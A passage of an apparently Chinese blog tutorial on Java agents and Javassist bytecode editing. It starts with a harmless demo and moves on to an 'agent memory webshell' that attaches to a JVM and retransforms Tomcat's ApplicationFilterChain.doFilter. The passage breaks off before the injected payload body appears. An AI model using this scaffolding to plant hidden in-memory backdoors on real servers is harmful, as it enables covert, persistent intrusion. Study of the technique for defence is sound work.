Class。这个很重要，该方法是1.6 之后加入的，事实上，该方法是 update 了一个类。</span></span><br><span class="line">    <span class="function"><span class="keyword">void</span> <span class="title">retransformClasses</span><span class="params">(Class&lt;?&gt;... classes)</span> <span class="keyword">throws</span> UnmodifiableClassException</span>;</span><br><span class="line">    <span class="comment">// 判断目标类是否能够修改。</span></span><br><span class="line">    <span class="function"><span class="keyword">boolean</span> <span class="title">isModifiableClass</span><span class="params">(Class&lt;?&gt; theClass)</span></span>;</span><br><span class="line">    <span class="comment">// 获取目标已经加载的类。</span></span><br><span class="line">    <span class="meta">@SuppressWarnings(&quot;rawtypes&quot;)</span></span><br><span class="line">    Class\[\] getAllLoadedClasses();</span><br><span class="line">    ......&#125;</span><br></pre></td></tr></table></figure>

<h5 id="getAllloadedClasses和isModifiableClass"><a href="#getAllloadedClasses和isModifiableClass" class="headerlink" title="getAllloadedClasses和isModifiableClass"></a>getAllloadedClasses和isModifiableClass</h5><p>修改agentmain,在其中添加<code>getAllloadedClasses</code>方法</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> java.lang.instrument.Instrumentation;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="class"><span class="keyword">class</span> <span class="title">AgentMainTest</span> </span>&#123;</span><br><span class="line">    <span class="function"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title">agentmain</span><span class="params">(String args, Instrumentation instrumentation)</span></span>&#123;</span><br><span class="line"></span><br><span class="line">        Class[] classes=instrumentation.getAllLoadedClasses();</span><br><span class="line">        <span class="keyword">for</span>(Class aclass: classes)&#123;</span><br><span class="line">            System.out.println(aclass.getName()+<span class="string">&quot;\tModifiable==&gt;&quot;</span>+(instrumentation.isModifiableClass(aclass)?<span class="string">&quot;true&quot;</span>:<span class="string">&quot;false&quot;</span>));</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p><img src="https://picture-1304716932.cos.ap-chengdu.myqcloud.com/img/image-20220426165933108.png" alt="image-20220426165933108"></p>
<h5 id="addTransformer-和retransformClasses"><a href="#addTransformer-和retransformClasses" class="headerlink" title="addTransformer()和retransformClasses()"></a>addTransformer()和retransformClasses()</h5><p>在addTransformer()中的参数<code>ClassFileTransformer transformer</code>可以帮助我们完成修改字节码的工作</p>
<p>这是一个接口,提供了一个<code>transform</code>方法</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="class"><span class="keyword">interface</span> <span class="title">ClassFileTransformer</span> </span>&#123;</span><br><span class="line">    <span class="keyword">default</span> <span class="keyword">byte</span>\[\]</span><br><span class="line">    transform(  ClassLoader         loader,</span><br><span class="line">                String              className,</span><br><span class="line">                Class&lt;?&gt;            classBeingRedefined,</span><br><span class="line">                ProtectionDomain    protectionDomain,</span><br><span class="line">                <span class="keyword">byte</span>\[\]              classfileBuffer) &#123;</span><br><span class="line">        ....</span><br><span class="line">    &#125;&#125;</span><br><span class="line"><span class="comment">/*使用Instrumentation.addTransformer()来加载一个转换器。</span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment">转换器的返回结果（transform()方法的返回值）将成为转换后的字节码。</span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment">对于没有加载的类，会使用ClassLoader.defineClass()定义它；对于已经加载的类，会使用ClassLoader.redefineClasses()重新定义，并配合Instrumentation.retransformClasses进行转换。</span></span><br><span class="line"><span class="comment">*/</span></span><br></pre></td></tr></table></figure>

<p>现在有了修改Class字节码的方法,还缺少一个工具<code>javassist</code></p>
<h4 id="javassist"><a href="#javassist" class="headerlink" title="javassist"></a>javassist</h4><blockquote>
<p>Javassist (JAVA programming ASSISTant) 是在 Java 中编辑字节码的类库;它使 Java 程序能够在运行时定义一个新类, 并在 JVM 加载时修改类文件。</p>
<p>我们常用到的动态特性主要是反射，在运行时查找对象属性、方法，修改作用域，通过方法名称调用方法等。在线的应用不会频繁使用反射，因为反射的性能开销较大。其实还有一种和反射一样强大的特性，但是开销却很低，它就是Javassit。</p>
<p>与其他类似的字节码编辑器不同, Javassist 提供了两个级别的 API: 源级别和字节码级别。 如果用户使用源级 API, 他们可以编辑类文件, 而不知道 Java 字节码的规格。 整个 API 只用 Java 语言的词汇来设计。 您甚至可以以源文本的形式指定插入的字节码; Javassist 在运行中编译它。 另一方面, 字节码级 API 允许用户直接编辑类文件作为其他编辑器。</p>
</blockquote>
<h5 id="ClassPool"><a href="#ClassPool" class="headerlink" title="ClassPool"></a>ClassPool</h5><p>这个类是javassist的核心组件之一</p>
<p>简单来说，这就是个容器，存放的是<code>CtClass</code>对象。</p>
<p>获得方法： ClassPool cp = ClassPool.getDefault();。通过 ClassPool.getDefault() 获取的 ClassPool 使用 JVM 的类搜索路径。<strong>如果程序运行在 JBoss 或者 Tomcat 等 Web 服务器上，ClassPool 可能无法找到用户的类，因为 Web 服务器使用多个类加载器作为系统类加载器。在这种情况下，ClassPool 必须添加额外的类搜索路径。</strong></p>
<p><code>cp.insertClassPath(new ClassClassPath(&lt;Class&gt;));</code></p>
<h5 id="CtClass"><a href="#CtClass" class="headerlink" title="CtClass"></a>CtClass</h5><p>可以把它理解成加强版的Class对象,需要从ClassPool中获得</p>
<p>获得方法<code>CtClass cc=cp.get(ClassName)</code></p>
<h5 id="CtMethod"><a href="#CtMethod" class="headerlink" title="CtMethod"></a>CtMethod</h5><p>可以理解为加强版的Method对象</p>
<p>获得方法:<code>CtMethod m=cc.getDeclaredMethod(MethodName)</code></p>
<p>这个类提供了一些方法,让我们可以很方便的修改方法体</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="keyword">final</span> <span class="class"><span class="keyword">class</span> <span class="title">CtMethod</span> <span class="keyword">extends</span> <span class="title">CtBehavior</span> </span>&#123;</span><br><span class="line">    <span class="comment">// 主要的内容都在父类 CtBehavior 中&#125;// 父类 CtBehaviorpublic abstract class CtBehavior extends CtMember &#123;</span></span><br><span class="line">    <span class="comment">// 设置方法体</span></span><br><span class="line">    <span class="function"><span class="keyword">public</span> <span class="keyword">void</span> <span class="title">setBody</span><span class="params">(String src)</span></span>;</span><br><span class="line">    <span class="comment">// 插入在方法体最前面</span></span><br><span class="line">    <span class="function"><span class="keyword">public</span> <span class="keyword">void</span> <span class="title">insertBefore</span><span class="params">(String src)</span></span>;</span><br><span class="line">    <span class="comment">// 插入在方法体最后面</span></span><br><span class="line">    <span class="function"><span class="keyword">public</span> <span class="keyword">void</span> <span class="title">insertAfter</span><span class="params">(String src)</span></span>;</span><br><span class="line">    <span class="comment">// 在方法体的某一行插入内容</span></span><br><span class="line">    <span class="function"><span class="keyword">public</span> <span class="keyword">int</span> <span class="title">insertAt</span><span class="params">(<span class="keyword">int</span> lineNum, String src)</span></span>;&#125;</span><br></pre></td></tr></table></figure>

<p>传递给方法 <code>insertBefore()</code> ，<code>insertAfter()</code> 和 <code>insertAt()</code> 的 String 对象<strong>是由<code>Javassist</code> 的编译器编译的</strong>。 由于编译器支持语言扩展，以 $ 开头的几个标识符有特殊的含义：</p>
<table>
<thead>
<tr>
<th align="left">符号</th>
<th align="left">含义</th>
</tr>
</thead>
<tbody><tr>
<td align="left">$0, $1, $2, …</td>
<td align="left">$0 = this; $1 = args[1] …..(也就是$0代表this,$1..这些代表当前方法的参数)</td>
</tr>
<tr>
<td align="left">$args</td>
<td align="left">方法参数数组.它的类型为 Object[]</td>
</tr>
<tr>
<td align="left">$$</td>
<td align="left">所有实参。例如, m($$) 等价于 m($1,$2,…)</td>
</tr>
<tr>
<td align="left">$cflow(…)</td>
<td align="left">cflow 变量</td>
</tr>
<tr>
<td align="left">$r</td>
<td align="left">返回结果的类型，用于强制类型转换</td>
</tr>
<tr>
<td align="left">$w</td>
<td align="left">包装器类型，用于强制类型转换</td>
</tr>
<tr>
<td align="left">$_</td>
<td align="left">返回值</td>
</tr>
</tbody></table>
<p>一个简单的agent例子</p>
<h4 id="agent-jar"><a href="#agent-jar" class="headerlink" title="agent.jar"></a>agent.jar</h4><p>首先看agent.jar包内的代码</p>
<h5 id="MANIFEST-MF"><a href="#MANIFEST-MF" class="headerlink" title="MANIFEST.MF"></a>MANIFEST.MF</h5><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">Manifest-Version: <span class="number">1.0</span></span><br><span class="line">Agent-Class: AgentDemo</span><br><span class="line">Can-Redefine-Classes: <span class="keyword">true</span></span><br><span class="line">Can-Retransform-Classes: <span class="keyword">true</span></span><br><span class="line"></span><br></pre></td></tr></table></figure>

<h5 id="TransformerDemo-java"><a href="#TransformerDemo-java" class="headerlink" title="TransformerDemo.java"></a>TransformerDemo.java</h5><p><code>ClassFileTransformer</code>实现类</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="class"><span class="keyword">class</span> <span class="title">TransformerDemo</span> <span class="keyword">implements</span> <span class="title">ClassFileTransformer</span> </span>&#123;</span><br><span class="line">    <span class="keyword">public</span> String targetClassName;</span><br><span class="line">    <span class="keyword">public</span> String targetMethodName ;</span><br><span class="line">    <span class="keyword">public</span> String targetVMClassName;</span><br><span class="line"></span><br><span class="line">    <span class="function"><span class="keyword">public</span> <span class="title">TransformerDemo</span><span class="params">(String targetClassName, String targetMethodName)</span> </span>&#123;</span><br><span class="line">        <span class="keyword">this</span>.targetClassName = targetClassName;</span><br><span class="line">        <span class="keyword">this</span>.targetMethodName = targetMethodName;</span><br><span class="line">        <span class="keyword">this</span>.targetVMClassName = <span class="keyword">new</span> String(targetClassName).replaceAll(<span class="string">&quot;\\.&quot;</span>,<span class="string">&quot;\\/&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="meta">@Override</span></span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">byte</span>[] transform(ClassLoader loader, String className, Class&lt;?&gt; classBeingRedefined, ProtectionDomain protectionDomain, <span class="keyword">byte</span>[] classfileBuffer) <span class="keyword">throws</span> IllegalClassFormatException  &#123;</span><br><span class="line">        <span class="keyword">if</span>(!className.equals(targetVMClassName))&#123;</span><br><span class="line">            System.out.println(<span class="string">&quot;not do transform&quot;</span>);</span><br><span class="line">            <span class="keyword">return</span> classfileBuffer;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">try</span> &#123;</span><br><span class="line">            System.out.println(<span class="string">&quot;do transform&quot;</span>);</span><br><span class="line">            ClassPool cp = ClassPool.getDefault();</span><br><span class="line"></span><br><span class="line">            CtClass ctc = cp.get(<span class="keyword">this</span>.targetClassName);</span><br><span class="line">            System.out.println(ctc.getName());</span><br><span class="line">            CtMethod method = ctc.getDeclaredMethod(<span class="keyword">this</span>.targetMethodName);</span><br><span class="line">            System.out.println(method.getName());</span><br><span class="line">            String source = <span class="string">&quot;&#123;System.out.println(\&quot;hello transformer\&quot;);&#125;&quot;</span>;</span><br><span class="line">            method.setBody(source);</span><br><span class="line">            <span class="keyword">byte</span>[] bytes = ctc.toBytecode();</span><br><span class="line"></span><br><span class="line">            <span class="keyword">return</span> bytes;</span><br><span class="line">        &#125; <span class="keyword">catch</span> (Exception e)&#123;</span><br><span class="line">            e.printStackTrace();</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">return</span> <span class="keyword">null</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h5 id="AgentDemo-java"><a href="#AgentDemo-java" class="headerlink" title="AgentDemo.java"></a>AgentDemo.java</h5><p>agentmain方法实现类</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="class"><span class="keyword">class</span> <span class="title">AgentDemo</span> </span>&#123;</span><br><span class="line">    <span class="keyword">private</span> <span class="keyword">static</span> String className = <span class="string">&quot;com.test.Hello&quot;</span>;</span><br><span class="line">    <span class="keyword">private</span> <span class="keyword">static</span> String methodName = <span class="string">&quot;hello&quot;</span>;</span><br><span class="line"></span><br><span class="line">    <span class="function"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title">agentmain</span><span class="params">(String agentArgs, Instrumentation inst)</span> <span class="keyword">throws</span> Exception </span>&#123;</span><br><span class="line">        System.out.println(<span class="string">&quot;agentmain启动!!&quot;</span>);</span><br><span class="line">        inst.addTransformer(<span class="keyword">new</span> TransformerDemo(className, methodName), <span class="keyword">true</span>);</span><br><span class="line">        <span class="comment">//这个参数一定要写true,否则new出来的transformer不能修改类</span></span><br><span class="line">        <span class="keyword">try</span> &#123;</span><br><span class="line">            List&lt;Class&gt; needRetransformClasses = <span class="keyword">new</span> LinkedList&lt;Class&gt;();</span><br><span class="line">            Class[] loadedClasses = inst.getAllLoadedClasses();</span><br><span class="line">            <span class="keyword">for</span> (Class c : loadedClasses) &#123;</span><br><span class="line">                <span class="keyword">if</span> (c.getName().equals(className)) &#123;</span><br><span class="line">                    System.out.println(<span class="string">&quot;找到要修改的类了!!!&quot;</span>);</span><br><span class="line">                    Method[] methods = c.getDeclaredMethods();</span><br><span class="line">                    <span class="keyword">for</span> (Method method : methods) &#123;</span><br><span class="line">                        System.out.println(method.getName());</span><br><span class="line">                    &#125;</span><br><span class="line">                    inst.retransformClasses(c);</span><br><span class="line">                &#125;</span><br><span class="line">            &#125;</span><br><span class="line"></span><br><span class="line">        &#125; <span class="keyword">catch</span> (Exception e) &#123;</span><br><span class="line"></span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>然后按照之前打包的方法打包成jar包</p>
<p>接下来是测试类代码</p>
<h5 id="Hello-java"><a href="#Hello-java" class="headerlink" title="Hello.java"></a>Hello.java</h5><p>这个类中的hello方法是要修改的目标方法</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">package</span> com.test;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="class"><span class="keyword">class</span> <span class="title">Hello</span> </span>&#123;</span><br><span class="line">    <span class="function"><span class="keyword">public</span> <span class="keyword">void</span> <span class="title">hello</span><span class="params">()</span> <span class="keyword">throws</span> InterruptedException </span>&#123;</span><br><span class="line">            System.out.println(<span class="string">&quot;hello world!!!&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="function"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title">main</span><span class="params">(String[] args)</span><span class="keyword">throws</span> Exception </span>&#123;</span><br><span class="line">        Hello h1 = <span class="keyword">new</span> Hello();</span><br><span class="line">        <span class="keyword">while</span>(<span class="keyword">true</span>)&#123;</span><br><span class="line">            h1.hello();</span><br><span class="line">            Thread.sleep(<span class="number">1000</span>);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<h5 id="HelloWorld-java"><a href="#HelloWorld-java" class="headerlink" title="HelloWorld.java"></a>HelloWorld.java</h5><p>这个类是连接虚拟机启动javaagent的类</p>
<p>我在里面写了个循环遍历list,这样就不用等Hello运行之后再<code>jps -l</code>方法去寻找对应的pid了</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">package</span> com.test;</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> com.sun.tools.attach.VirtualMachine;</span><br><span class="line"><span class="keyword">import</span> com.sun.tools.attach.VirtualMachineDescriptor;</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> java.util.List;</span><br><span class="line"><span class="keyword">public</span> <span class="class"><span class="keyword">class</span> <span class="title">HelloWorld</span> </span>&#123;</span><br><span class="line">    <span class="function"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> Exception</span>&#123;</span><br><span class="line">        List&lt;VirtualMachineDescriptor&gt; virtualMachineDescriptors = VirtualMachine.list();</span><br><span class="line">        <span class="keyword">for</span>(<span class="keyword">int</span> i=<span class="number">0</span>;i&lt;virtualMachineDescriptors.size();i++)&#123;</span><br><span class="line">            <span class="keyword">if</span>(virtualMachineDescriptors.get(i).displayName().contains(<span class="string">&quot;Hello&quot;</span>))&#123;</span><br><span class="line">                <span class="keyword">try</span>&#123;</span><br><span class="line">                    String id=virtualMachineDescriptors.get(i).id();</span><br><span class="line">                    <span class="comment">//连接虚拟机</span></span><br><span class="line">                    VirtualMachine vm=VirtualMachine.attach(id);</span><br><span class="line">                    <span class="comment">//提供代理jar包路径</span></span><br><span class="line">                    vm.loadAgent(<span class="string">&quot;H:\\java\\rubbish\\agent\\out\\artifacts\\agent_jar\\agent.jar&quot;</span>);</span><br><span class="line">                    vm.detach();</span><br><span class="line">                    System.out.println(<span class="string">&quot;ends----&quot;</span>);</span><br><span class="line">                    <span class="keyword">break</span>;</span><br><span class="line">                &#125;<span class="keyword">catch</span> (Exception e)&#123;</span><br><span class="line">                    <span class="keyword">continue</span>;</span><br><span class="line">                &#125;</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p><img src="https://picture-1304716932.cos.ap-chengdu.myqcloud.com/image-20220426220901529.png" alt="image-20220426220901529"></p>
<h4 id="Agent内存马"><a href="#Agent内存马" class="headerlink" title="Agent内存马"></a>Agent内存马</h4><p>在实验过程中,出现了一个让我摸不着头脑的错误</p>
<p>经过多次尝试和su18大佬的指导,确定了问题所在</p>
<p>首先解决了昨天不能调试的问题</p>
<p>在tomcat项目(比如springMVC)的lib中引入agent.jar,然后就可以看到对应的class文件,在对应的class文件中下断点即可</p>
<p>但是无法得知getDefault方法的结果</p>
<p>使用idea的evaluate expression来运行得到报错信息,是类未找到,也就是说,没有找到对应的.calss文件,解决了好久,尝试了自己写类加载器,但是还是失败了</p>
<img src="https://picture-1304716932.cos.ap-chengdu.myqcloud.com/img/image-20220427143235362.png" alt="image-20220427143235362" style="zoom: 67%;" />



<p>最后参考了<a target="_blank" rel="noopener" href="https://github.com/rebeyond/memShell">rebeyond</a>大佬的做法,将javassist.jar解压后的到的jvassist文件夹放到agent的代码同级目录一起打包成agent.jar</p>
<blockquote>
<p>打包之前,需要先删除已有的artifacts,否则会把这个javassist继续打包成jar,只需要按照最上面的设置重新整一个artifacts就行了</p>
</blockquote>
<p><img src="https://picture-1304716932.cos.ap-chengdu.myqcloud.com/img/image-20220429105814605.png" alt="image-20220429105814605"></p>
<p>这样完美解决了找不到类的问题</p>
<h5 id="代码"><a href="#代码" class="headerlink" title="代码"></a>代码</h5><p>连接虚拟机启动的代码并没有变化,主要的变化在agent中</p>
<p>MANIFEST.MF文件没有变化</p>
<h5 id="AgentDemo"><a href="#AgentDemo" class="headerlink" title="AgentDemo"></a>AgentDemo</h5><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> java.lang.instrument.Instrumentation;</span><br><span class="line"><span class="keyword">public</span> <span class="class"><span class="keyword">class</span> <span class="title">AgentDemo</span> </span>&#123;</span><br><span class="line">    <span class="keyword">private</span> <span class="keyword">static</span> String className = <span class="string">&quot;org.apache.catalina.core.ApplicationFilterChain&quot;</span>;</span><br><span class="line">    <span class="keyword">private</span> <span class="keyword">static</span> String methodName = <span class="string">&quot;doFilter&quot;</span>;</span><br><span class="line"></span><br><span class="line">    <span class="function"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title">agentmain</span><span class="params">(String agentArgs, Instrumentation inst)</span> <span class="keyword">throws</span> Exception </span>&#123;</span><br><span class="line"></span><br><span class="line">        System.out.println(<span class="string">&quot;agentmain启动!!&quot;</span>);</span><br><span class="line">        Class[] loadedClasses = inst.getAllLoadedClasses();</span><br><span class="line">        <span class="keyword">try</span> &#123;</span><br><span class="line"></span><br><span class="line">            <span class="keyword">for</span> (Class c : loadedClasses) &#123;</span><br><span class="line">                <span class="keyword">if</span> (c.getName().equals(className)) &#123;</span><br><span class="line">                    System.out.println(<span class="string">&quot;找到要修改的类了!!!&quot;</span>);</span><br><span class="line"></span><br><span class="line">                    inst.addTransformer(<span class="keyword">new</span> TransformerDemo(className, methodName), <span class="keyword">true</span>);</span><br><span class="line">                    inst.retransformClasses(c);</span><br><span class="line">                &#125;</span><br><span class="line">            &#125;</span><br><span class="line"></span><br><span class="line">        &#125; <span class="keyword">catch</span> (Exception e) &#123;</span><br><span class="line"></span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">&#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<h5 id="TransformerDemo"><a href="#TransformerDemo" class="headerlink" title="TransformerDemo"></a>TransformerDemo</h5><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> javassist.ClassClassPath;</span><br><span class="line"><span class="keyword">import</span> javassist.ClassPool;</span><br><span class="line"><span class="keyword">import</span> javassist.CtClass;</span><br><span class="line"><span class="keyword">import</span> javassist.CtMethod;</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> java.io.*;</span><br><span class="line"><span class="keyword">import</span> java.lang.annotation.Annotation;</span><br><span class="line"><span class="keyword">import</span> java.lang.instrument.ClassFileTransformer;</span><br><span class="line"><span class="keyword">import</span> java.lang.instrument.IllegalClassFormatException;</span><br><span class="line"><span class="keyword">import</span> java.lang.reflect.Method;</span><br><span class="line"><span class="keyword">import</span> java.net.URL;</span><br><span class="line"><span class="keyword">import</span> java.net.URLClassLoader;</span><br><span class="line"><span class="keyword">import</span> java.net.URLDecoder;</span><br><span class="line"><span class="keyword">import</span> java.security.ProtectionDomain;</span><br><span class="line"><span class="keyword">import</span> java.util.*;</span><br><span class="line"><span class="keyword">import</span> java.util.jar.JarEntry;</span><br><span class="line"><span class="keyword">import</span> java.util.jar.JarFile;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="class"><span class="keyword">class</span> <span class="title">TransformerDemo</span> <span class="keyword">implements</span> <span class="title">ClassFileTransformer</span> </span>&#123;</span><br><span class="line">    <span class="keyword">public</span> String targetClassName;</span><br><span class="line">    <span class="keyword">public</span> String targetMethodName;</span><br><span class="line">    <span class="keyword">public</span> String targetVMClassName;</span><br><span class="line"></span><br><span class="line">    <span class="function"><span class="keyword">public</span> <span class="title">TransformerDemo</span><span class="params">(String targetClassName, String targetMethodName)</span> </span>&#123;</span><br><span class="line">        <span class="keyword">this</span>.targetClassName = targetClassName;</span><br><span class="line">        <span class="keyword">this</span>.targetMethodName = targetMethodName;</span><br><span class="line">        <span class="keyword">this</span>.targetVMClassName = <span class="keyword">new</span> String(targetClassName).replaceAll(<span class="string">&quot;\\.&quot;</span>, <span class="string">&quot;\\/&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="function"><span class="keyword">public</span> String <span class="title">readTXT</span><span class="params">(String path)</span> </span>&#123;</span><br><span class="line">        <span class="keyword">try</span> &#123;</span><br><span class="line">            BufferedReader br = <span class="keyword">new</span> BufferedReader(<span class="keyword">new</span> InputStreamReader(<span class="keyword">new</span> FileInputStream(path), <span class="string">&quot;utf-8&quot;</span>));</span><br><span class="line">            StringBuffer bf = <span class="keyword">new</span> StringBuffer();</span><br><span class="line">            String line = <span class="keyword">null</span>;</span><br><span 